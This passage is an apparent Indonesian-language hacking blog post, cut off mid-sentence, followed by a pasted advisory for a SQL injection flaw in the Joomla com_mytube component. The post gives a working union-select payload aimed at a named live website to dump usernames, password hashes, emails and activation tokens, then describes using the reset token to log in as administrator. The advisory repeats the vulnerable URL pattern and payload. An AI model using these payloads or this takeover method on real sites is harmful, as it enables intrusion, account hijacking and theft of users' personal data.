Im just bLo69er....

Ini adalah sebuah trik dengan memaksimalkan exploit dari component joomla yang vuln agar dapat masuk sebagai admin di situs berbasis cms joomla. Mungkin kalian pernah bingung bagaimana cara crack hash joomla,, uda crack kesana kesini namun tidak mendapatkan hasil, berikut saya ada sedikit trik untuk mengakalinya. Yaitu dengan cara reset password dan memasukan token, token disini bukan tanda ' ya,, disini kita memaksimalkan exploit dari component joomla yang vuln. misal anda menggunakan exploit com_mytube http://www.malaysia-instinct.com/english/index.php?view=videos&type=member&user_id=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat%28username,0x3a,password,0x3a,email,0x3a,activation,0x3c62723e%29,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users--&option=com_mytube&Itemid=r3m1ck akan muncul username , password , email dan activation . disini kita akan menggunakan email dan activation nya. pertama buka halaman reset passwordnya dengan m

[!]========================================[!] #Joomla Component com_mytube SQLi Vulnerability (id) #Author     : r3m1ck(r3m1ck@hackermail.com) #Homepage: http://www.r3m1ck.uni.cc/ #Date     : 6 Desember, 2009 [!]========================================[!] [ Software Information ] #Application   : MyRemote Video Gallery #version       : 1.0 Beta #Developer     : Jomtube Team #License       : GPL            type  : Non-Commercial #Date Added    : Aug 24, 2009 #Download      : http://joomlacode.org/gf/download/frsrelease/10834/42943/com_mytube_1.0.0_2009.08.02.zip [!]========================================[!] [ Vulnerable File ] http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=[U3D-Crew]&option=com_mytube&Itemid=r3m1ck [ XpL ] 69+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat (username,0x3a,password,0x3a,email,0x3c62723e),14,15,16,17,18,19,20,21, 22,23,24,25,26+from+jos_users--&option=com_mytube&Itemid=r3m